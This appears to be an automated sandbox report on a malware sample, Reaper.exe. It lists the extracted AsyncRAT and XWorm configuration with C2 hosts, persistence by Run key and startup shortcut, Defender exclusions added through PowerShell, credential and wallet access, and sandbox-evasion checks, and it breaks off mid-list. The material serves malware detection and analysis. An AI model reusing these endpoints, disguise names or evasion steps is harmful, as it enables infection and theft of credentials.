Analysis
-
max time kernel
86s -
max time network
101s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 05:17
Static task
static1
General
-
Target
Reaper.exe
-
Size
8.4MB
-
MD5
caa418507bb991b91bbfa3e52623c2f4
-
SHA1
9e1083e019ca8813024e1e58eac193d7a83b4b48
-
SHA256
a8e3cbf1921a2485a307ac0ff2536accc77bc17db386a00e8d67c5537613b321
-
SHA512
84e57b9c0d88e67c2ebb3ef89df82b33b4d466b663fa1b43dd0c050b140fbc986135169c8840b4d91ed5921379579a85e743cda27184172a7a7eb87156c61684
-
SSDEEP
196608:SRyi9wysiM2+eLNxHPZe/eAwfPjprt/VU3jZoAp/aOROsEh/cH:SRLSIr+eLDvM9YBNMrQsh
Malware Config
Extracted
asyncrat
L838 RAT v1.0.0
Default
127.0.0.1:54984
127.0.0.1:4449
l838.ddns.net:54984
l838.ddns.net:4449
azjrpxchkiev
-
delay
1
-
install
true
-
install_file
Windows Driver Foundation.exe
-
install_folder
%Temp%
Extracted
xworm
l838.ddns.net:3232
-
Install_directory
%Public%
-
install_file
Windows Service Wrapper.exe
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\Windows Service Wrapper.exe family_xworm behavioral1/memory/4968-62-0x0000000000540000-0x0000000000556000-memory.dmp family_xworm -
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\Windows Driver Foundation.exe family_asyncrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 31 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3344 powershell.exe 3084 powershell.exe 7300 powershell.exe 6012 powershell.exe 2244 powershell.exe 2692 powershell.exe 4904 powershell.exe 2028 powershell.exe 6820 powershell.exe 1184 powershell.exe 4304 powershell.exe 3368 powershell.exe 6808 powershell.exe 7968 powershell.exe 7212 powershell.exe 5656 powershell.exe 1936 powershell.exe 7988 powershell.exe 1132 powershell.exe 6104 powershell.exe 4380 powershell.exe 972 powershell.exe 572 powershell.exe 5556 powershell.exe 2260 powershell.exe 6452 powershell.exe 7092 powershell.exe 7108 powershell.exe 4680 powershell.exe 1832 powershell.exe 6876 powershell.exe -
Drops file in Drivers directory 6 IoCs
Processes:
attrib.exeattrib.exeWindows SmartScreen.exeattrib.exeattrib.exeWindows SmartScreen.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Windows SmartScreen.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Windows SmartScreen.exe -
Checks computer location settings 2 TTPs 22 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Reaper.exeReaper.exeWindows Service Wrapper.exeReaper.exeReaper.exeReaper.exeReaper.exeReaper.exeReaper.exeReaper.exeReaper.exeReaper.exeReaper.exeReaper.exeReaper.exeReaper.exeReaper.exeReaper.exeReaper.exeReaper.exeReaper.exeReaper.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation Reaper.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation Reaper.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation Windows Service Wrapper.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation Reaper.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation Reaper.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation Reaper.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation Reaper.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation Reaper.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation Reaper.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation Reaper.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation Reaper.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation Reaper.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation Reaper.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation Reaper.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation Reaper.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation Reaper.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation Reaper.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation Reaper.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation Reaper.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation Reaper.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation Reaper.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation Reaper.exe -
Drops startup file 2 IoCs
Processes:
Windows Service Wrapper.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Service Wrapper.lnk Windows Service Wrapper.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Service Wrapper.lnk Windows Service Wrapper.exe -
Executes dropped EXE 64 IoCs
Processes:
Windows Driver Foundation.exeWindows Service Wrapper.exeWindows Driver Foundation.exeWindows SmartScreen.exeWindows Service Wrapper.exeWindows SmartScreen.exeWindows SmartScreen.exeWindows SmartScreen.exeWindows Driver Foundation.exeWindows Service Wrapper.exeWindows SmartScreen.exeWindows SmartScreen.exeWindows Service Wrapper.exeWindows Driver Foundation.exeWindows SmartScreen.exeWindows SmartScreen.exeWindows Driver Foundation.exeWindows Service Wrapper.exeWindows SmartScreen.exeWindows SmartScreen.exeWindows Driver Foundation.exeWindows Service Wrapper.exeWindows SmartScreen.exeWindows SmartScreen.exeWindows Driver Foundation.exeWindows Service Wrapper.exeWindows SmartScreen.exeWindows SmartScreen.exeWindows Driver Foundation.exeWindows Service Wrapper.exeWindows SmartScreen.exeWindows SmartScreen.exeWindows Driver Foundation.exeWindows Service Wrapper.exeWindows SmartScreen.exeWindows SmartScreen.exeWindows Driver Foundation.exeWindows Service Wrapper.exeWindows SmartScreen.exeWindows SmartScreen.exeWindows Driver Foundation.exeWindows Service Wrapper.exeWindows SmartScreen.exeWindows SmartScreen.exeWindows Driver Foundation.exeWindows Service Wrapper.exeWindows SmartScreen.exeWindows SmartScreen.exeWindows Driver Foundation.exeWindows Service Wrapper.exeWindows SmartScreen.exeWindows SmartScreen.exeWindows Driver Foundation.exeWindows Service Wrapper.exeWindows SmartScreen.exeWindows SmartScreen.exeWindows Driver Foundation.exeWindows Service Wrapper.exeWindows SmartScreen.exeWindows SmartScreen.exeWindows Driver Foundation.exeWindows Service Wrapper.exeWindows SmartScreen.exeWindows SmartScreen.exepid process 3680 Windows Driver Foundation.exe 4968 Windows Service Wrapper.exe 2032 Windows Driver Foundation.exe 4908 Windows SmartScreen.exe 4880 Windows Service Wrapper.exe 4528 Windows SmartScreen.exe 4748 Windows SmartScreen.exe 388 Windows SmartScreen.exe 4744 Windows Driver Foundation.exe 2272 Windows Service Wrapper.exe 1460 Windows SmartScreen.exe 4204 Windows SmartScreen.exe 112 Windows Service Wrapper.exe 1084 Windows Driver Foundation.exe 4788 Windows SmartScreen.exe 5052 Windows SmartScreen.exe 1584 Windows Driver Foundation.exe 2196 Windows Service Wrapper.exe 316 Windows SmartScreen.exe 5432 Windows SmartScreen.exe 6020 Windows Driver Foundation.exe 6080 Windows Service Wrapper.exe 6100 Windows SmartScreen.exe 3984 Windows SmartScreen.exe 5372 Windows Driver Foundation.exe 5436 Windows Service Wrapper.exe 4336 Windows SmartScreen.exe 6444 Windows SmartScreen.exe 4636 Windows Driver Foundation.exe 6828 Windows Service Wrapper.exe 6832 Windows SmartScreen.exe 7064 Windows SmartScreen.exe 4656 Windows Driver Foundation.exe 5936 Windows Service Wrapper.exe 5472 Windows SmartScreen.exe 5220 Windows SmartScreen.exe 924 Windows Driver Foundation.exe 7148 Windows Service Wrapper.exe 1796 Windows SmartScreen.exe 7180 Windows SmartScreen.exe 7540 Windows Driver Foundation.exe 7612 Windows Service Wrapper.exe 7692 Windows SmartScreen.exe 8040 Windows SmartScreen.exe 8108 Windows Driver Foundation.exe 5808 Windows Service Wrapper.exe 4268 Windows SmartScreen.exe 2396 Windows SmartScreen.exe 8076 Windows Driver Foundation.exe 4368 Windows Service Wrapper.exe 3064 Windows SmartScreen.exe 5236 Windows SmartScreen.exe 4956 Windows Driver Foundation.exe 6876 Windows Service Wrapper.exe 6444 Windows SmartScreen.exe 8020 Windows SmartScreen.exe 8132 Windows Driver Foundation.exe 7144 Windows Service Wrapper.exe 4724 Windows SmartScreen.exe 7184 Windows SmartScreen.exe 6160 Windows Driver Foundation.exe 6504 Windows Service Wrapper.exe 5572 Windows SmartScreen.exe 3560 Windows SmartScreen.exe -
Loads dropped DLL 64 IoCs
Processes:
Windows SmartScreen.exeWindows SmartScreen.exeWindows SmartScreen.exeWindows SmartScreen.exepid process 4748 Windows SmartScreen.exe 4748 Windows SmartScreen.exe 4748 Windows SmartScreen.exe 388 Windows SmartScreen.exe 388 Windows SmartScreen.exe 388 Windows SmartScreen.exe 4748 Windows SmartScreen.exe 4748 Windows SmartScreen.exe 388 Windows SmartScreen.exe 388 Windows SmartScreen.exe 4204 Windows SmartScreen.exe 4204 Windows SmartScreen.exe 4204 Windows SmartScreen.exe 4748 Windows SmartScreen.exe 4748 Windows SmartScreen.exe 4748 Windows SmartScreen.exe 4748 Windows SmartScreen.exe 388 Windows SmartScreen.exe 4748 Windows SmartScreen.exe 4748 Windows SmartScreen.exe 4204 Windows SmartScreen.exe 4204 Windows SmartScreen.exe 4748 Windows SmartScreen.exe 388 Windows SmartScreen.exe 4748 Windows SmartScreen.exe 388 Windows SmartScreen.exe 4748 Windows SmartScreen.exe 388 Windows SmartScreen.exe 388 Windows SmartScreen.exe 388 Windows SmartScreen.exe 388 Windows SmartScreen.exe 388 Windows SmartScreen.exe 388 Windows SmartScreen.exe 4748 Windows SmartScreen.exe 4748 Windows SmartScreen.exe 4748 Windows SmartScreen.exe 388 Windows SmartScreen.exe 4204 Windows SmartScreen.exe 4204 Windows SmartScreen.exe 4204 Windows SmartScreen.exe 4204 Windows SmartScreen.exe 388 Windows SmartScreen.exe 4204 Windows SmartScreen.exe 4204 Windows SmartScreen.exe 4204 Windows SmartScreen.exe 4204 Windows SmartScreen.exe 4204 Windows SmartScreen.exe 5052 Windows SmartScreen.exe 5052 Windows SmartScreen.exe 5052 Windows SmartScreen.exe 4204 Windows SmartScreen.exe 4204 Windows SmartScreen.exe 5052 Windows SmartScreen.exe 5052 Windows SmartScreen.exe 5052 Windows SmartScreen.exe 5052 Windows SmartScreen.exe 5052 Windows SmartScreen.exe 5052 Windows SmartScreen.exe 5052 Windows SmartScreen.exe 5052 Windows SmartScreen.exe 5052 Windows SmartScreen.exe 5052 Windows SmartScreen.exe 5052 Windows SmartScreen.exe 5052 Windows SmartScreen.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI49082\python311.dll upx behavioral1/memory/388-237-0x00007FFCE6680000-0x00007FFCE6C69000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI49082\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI45282\libffi-8.dll upx behavioral1/memory/388-260-0x00007FFCFF940000-0x00007FFCFF94F000-memory.dmp upx behavioral1/memory/4204-342-0x00007FFCE5F70000-0x00007FFCE6559000-memory.dmp upx behavioral1/memory/4748-363-0x00007FFCE5DF0000-0x00007FFCE5F67000-memory.dmp upx behavioral1/memory/4748-372-0x00007FFCFF880000-0x00007FFCFF88D000-memory.dmp upx behavioral1/memory/4204-374-0x00007FFCFCB20000-0x00007FFCFCB2F000-memory.dmp upx behavioral1/memory/388-389-0x00007FFCE5830000-0x00007FFCE59A7000-memory.dmp upx behavioral1/memory/388-393-0x00007FFCFB1B0000-0x00007FFCFB1DE000-memory.dmp upx behavioral1/memory/4748-443-0x00007FFCFB8D0000-0x00007FFCFB8DD000-memory.dmp upx behavioral1/memory/4748-455-0x00007FFCE4A70000-0x00007FFCE4B8C000-memory.dmp upx behavioral1/memory/4748-454-0x00007FFCFBF50000-0x00007FFCFBF73000-memory.dmp upx behavioral1/memory/388-442-0x00007FFCE6680000-0x00007FFCE6C69000-memory.dmp upx behavioral1/memory/4748-441-0x00007FFCFB190000-0x00007FFCFB1A4000-memory.dmp upx behavioral1/memory/388-440-0x00007FFCE54C0000-0x00007FFCE5578000-memory.dmp upx behavioral1/memory/388-439-0x00007FFCE3690000-0x00007FFCE3A08000-memory.dmp upx behavioral1/memory/388-392-0x00007FFCFBDA0000-0x00007FFCFBDAD000-memory.dmp upx behavioral1/memory/388-391-0x00007FFCFB600000-0x00007FFCFB619000-memory.dmp upx behavioral1/memory/4204-381-0x00007FFCFBDB0000-0x00007FFCFBDD3000-memory.dmp upx behavioral1/memory/4748-379-0x00007FFCE59B0000-0x00007FFCE5A68000-memory.dmp upx behavioral1/memory/388-378-0x00007FFCFB620000-0x00007FFCFB643000-memory.dmp upx behavioral1/memory/4748-377-0x00007FFCE5A70000-0x00007FFCE5DE8000-memory.dmp upx behavioral1/memory/388-376-0x00007FFCFB8E0000-0x00007FFCFB8F9000-memory.dmp upx behavioral1/memory/4748-375-0x00007FFCFB900000-0x00007FFCFB92E000-memory.dmp upx behavioral1/memory/4748-373-0x00007FFCE6D90000-0x00007FFCE7379000-memory.dmp upx behavioral1/memory/4748-371-0x00007FFCFBDE0000-0x00007FFCFBDF9000-memory.dmp upx behavioral1/memory/388-370-0x00007FFCFBE00000-0x00007FFCFBE2D000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI49082\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI45282\_lzma.pyd upx behavioral1/memory/4748-362-0x00007FFCFBE30000-0x00007FFCFBE53000-memory.dmp upx behavioral1/memory/4748-361-0x00007FFCFBE60000-0x00007FFCFBE79000-memory.dmp upx behavioral1/memory/4748-360-0x00007FFCFBED0000-0x00007FFCFBEFD000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI49082\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI49082\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI49082\_bz2.pyd upx behavioral1/memory/4204-475-0x00007FFCF5550000-0x00007FFCF5573000-memory.dmp upx behavioral1/memory/388-497-0x00007FFCFB170000-0x00007FFCFB184000-memory.dmp upx behavioral1/memory/388-494-0x00007FFCFB1B0000-0x00007FFCFB1DE000-memory.dmp upx behavioral1/memory/4204-529-0x00007FFCE5F70000-0x00007FFCE6559000-memory.dmp upx behavioral1/memory/5052-533-0x00007FFCECD80000-0x00007FFCECDA3000-memory.dmp upx behavioral1/memory/5052-534-0x00007FFCF4EE0000-0x00007FFCF4EEF000-memory.dmp upx behavioral1/memory/5052-629-0x00007FFCE6C10000-0x00007FFCE6D87000-memory.dmp upx behavioral1/memory/5052-630-0x00007FFCFBF00000-0x00007FFCFBF19000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI3162\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI3162\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI3162\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI3162\libssl-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI3162\libcrypto-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI3162\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI3162\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI3162\_decimal.pyd upx behavioral1/memory/5052-664-0x00007FFCF4EE0000-0x00007FFCF4EEF000-memory.dmp upx behavioral1/memory/5052-663-0x00007FFCECD80000-0x00007FFCECDA3000-memory.dmp upx behavioral1/memory/5052-662-0x00007FFCE24C0000-0x00007FFCE2AA9000-memory.dmp upx behavioral1/memory/5052-659-0x00007FFCE67D0000-0x00007FFCE6B48000-memory.dmp upx behavioral1/memory/5052-647-0x00007FFCFBDA0000-0x00007FFCFBDAD000-memory.dmp upx behavioral1/memory/5052-646-0x00007FFCFB8E0000-0x00007FFCFB8F4000-memory.dmp upx behavioral1/memory/5052-658-0x00007FFCE6B50000-0x00007FFCE6C08000-memory.dmp upx behavioral1/memory/5052-635-0x00007FFCE67D0000-0x00007FFCE6B48000-memory.dmp upx behavioral1/memory/5052-634-0x00007FFCE6B50000-0x00007FFCE6C08000-memory.dmp upx behavioral1/memory/5052-633-0x00007FFCFBDB0000-0x00007FFCFBDDE000-memory.dmp upx behavioral1/memory/5052-632-0x00007FFCFCB20000-0x00007FFCFCB2D000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Windows Service Wrapper.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Service Wrapper = "C:\\Users\\Public\\Windows Service Wrapper.exe" Windows Service Wrapper.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 10 ip-api.com 36 ip-api.com 65 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates processes with tasklist 1 TTPs 8 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 4456 tasklist.exe 7660 tasklist.exe 5768 tasklist.exe 5612 tasklist.exe 5544 tasklist.exe 5444 tasklist.exe 4776 tasklist.exe 3832 tasklist.exe -
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
Processes:
systeminfo.exesysteminfo.exepid process 6248 systeminfo.exe 860 systeminfo.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
Windows Service Wrapper.exepid process 4968 Windows Service Wrapper.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 572 powershell.exe 572 powershell.exe 1184 powershell.exe 1184 powershell.exe 1936 powershell.exe 1936 powershell.exe 1184 powershell.exe 1184 powershell.exe 4304 powershell.exe 4304 powershell.exe 572 powershell.exe 572 powershell.exe 3368 powershell.exe 3368 powershell.exe 2028 powershell.exe 2028 powershell.exe 6064 powershell.exe 6064 powershell.exe 3344 powershell.exe 3344 powershell.exe 1936 powershell.exe 1936 powershell.exe 5556 powershell.exe 5224 powershell.exe 5224 powershell.exe 5556 powershell.exe 4304 powershell.exe 4304 powershell.exe 2260 powershell.exe 2260 powershell.exe 6452 powershell.exe 6452 powershell.exe 3368 powershell.exe 3368 powershell.exe 2028 powershell.exe 2028 powershell.exe 6808 powershell.exe 6808 powershell.exe 6064 powershell.exe 6064 powershell.exe 3344 powershell.exe 3344 powershell.exe 5224 powershell.exe 5556 powershell.exe 7092 powershell.exe 7092 powershell.exe 2260 powershell.exe 6452 powershell.exe 3084 powershell.exe 3084 powershell.exe 1832 powershell.exe 1832 powershell.exe 6808 powershell.exe 7108 powershell.exe 7108 powershell.exe 7092 powershell.exe 7968 powershell.exe 7968 powershell.exe 3084 powershell.exe 7988 powershell.exe 7988 powershell.exe 7108 powershell.exe 1832 powershell.exe 7212 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Windows Driver Foundation.exeWindows Service Wrapper.exeWindows Driver Foundation.exeWindows Service Wrapper.exepowershell.exeWindows Driver Foundation.exeWindows Service Wrapper.exepowershell.exeWindows Service Wrapper.exeWindows Driver Foundation.exepowershell.exedescription pid process Token: SeDebugPrivilege 3680 Windows Driver Foundation.exe Token: SeDebugPrivilege 4968 Windows Service Wrapper.exe Token: SeDebugPrivilege 2032 Windows Driver Foundation.exe Token: SeDebugPrivilege 4880 Windows Service Wrapper.exe Token: SeDebugPrivilege 572 powershell.exe Token: SeDebugPrivilege 4744 Windows Driver Foundation.exe Token: SeDebugPrivilege 2272 Windows Service Wrapper.exe Token: SeDebugPrivilege 1184 powershell.exe Token: SeDebugPrivilege 112 Windows Service Wrapper.exe Token: SeDebugPrivilege 1084 Windows Driver Foundation.exe Token: SeIncreaseQuotaPrivilege 2032 Windows Driver Foundation.exe Token: SeSecurityPrivilege 2032 Windows Driver Foundation.exe Token: SeTakeOwnershipPrivilege 2032 Windows Driver Foundation.exe Token: SeLoadDriverPrivilege 2032 Windows Driver Foundation.exe Token: SeSystemProfilePrivilege 2032 Windows Driver Foundation.exe Token: SeSystemtimePrivilege 2032 Windows Driver Foundation.exe Token: SeProfSingleProcessPrivilege 2032 Windows Driver Foundation.exe Token: SeIncBasePriorityPrivilege 2032 Windows Driver Foundation.exe Token: SeCreatePagefilePrivilege 2032 Windows Driver Foundation.exe Token: SeBackupPrivilege 2032 Windows Driver Foundation.exe Token: SeRestorePrivilege 2032 Windows Driver Foundation.exe Token: SeShutdownPrivilege 2032 Windows Driver Foundation.exe Token: SeDebugPrivilege 2032 Windows Driver Foundation.exe Token: SeSystemEnvironmentPrivilege 2032 Windows Driver Foundation.exe Token: SeRemoteShutdownPrivilege 2032 Windows Driver Foundation.exe Token: SeUndockPrivilege 2032 Windows Driver Foundation.exe Token: SeManageVolumePrivilege 2032 Windows Driver Foundation.exe Token: 33 2032 Windows Driver Foundation.exe Token: 34 2032 Windows Driver Foundation.exe Token: 35 2032 Windows Driver Foundation.exe Token: 36 2032 Windows Driver Foundation.exe Token: SeDebugPrivilege 1936 powershell.exe Token: SeIncreaseQuotaPrivilege 3680 Windows Driver Foundation.exe Token: SeSecurityPrivilege 3680 Windows Driver Foundation.exe Token: SeTakeOwnershipPrivilege 3680 Windows Driver Foundation.exe Token: SeLoadDriverPrivilege 3680 Windows Driver Foundation.exe Token: SeSystemProfilePrivilege 3680 Windows Driver Foundation.exe Token: SeSystemtimePrivilege 3680 Windows Driver Foundation.exe Token: SeProfSingleProcessPrivilege 3680 Windows Driver Foundation.exe Token: SeIncBasePriorityPrivilege 3680 Windows Driver Foundation.exe Token: SeCreatePagefilePrivilege 3680 Windows Driver Foundation.exe Token: SeBackupPrivilege 3680 Windows Driver Foundation.exe Token: SeRestorePrivilege 3680 Windows Driver Foundation.exe Token: SeShutdownPrivilege 3680 Windows Driver Foundation.exe Token: SeDebugPrivilege 3680 Windows Driver Foundation.exe Token: SeSystemEnvironmentPrivilege 3680 Windows Driver Foundation.exe Token: SeRemoteShutdownPrivilege 3680 Windows Driver Foundation.exe Token: SeUndockPrivilege 3680 Windows Driver Foundation.exe Token: SeManageVolumePrivilege 3680 Windows Driver Foundation.exe Token: 33 3680 Windows Driver Foundation.exe Token: 34 3680 Windows Driver Foundation.exe Token: 35 3680 Windows Driver Foundation.exe Token: 36 3680 Windows Driver Foundation.exe Token: SeIncreaseQuotaPrivilege 4744 Windows Driver Foundation.exe Token: SeSecurityPrivilege 4744 Windows Driver Foundation.exe Token: SeTakeOwnershipPrivilege 4744 Windows Driver Foundation.exe Token: SeLoadDriverPrivilege 4744 Windows Driver Foundation.exe Token: SeSystemProfilePrivilege 4744 Windows Driver Foundation.exe Token: SeSystemtimePrivilege 4744 Windows Driver Foundation.exe Token: SeProfSingleProcessPrivilege 4744 Windows Driver Foundation.exe Token: SeIncBasePriorityPrivilege 4744 Windows Driver Foundation.exe Token: SeCreatePagefilePrivilege 4744 Windows Driver Foundation.exe Token: SeBackupPrivilege 4744 Windows Driver Foundation.exe Token: SeRestorePrivilege 4744 Windows Driver Foundation.exe -
Suspicious use of FindShellTrayWindow 52 IoCs
Processes:
taskmgr.exepid process 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe -
Suspicious use of SendNotifyMessage 52 IoCs
Processes:
taskmgr.exepid process 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe 7000 taskmgr.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
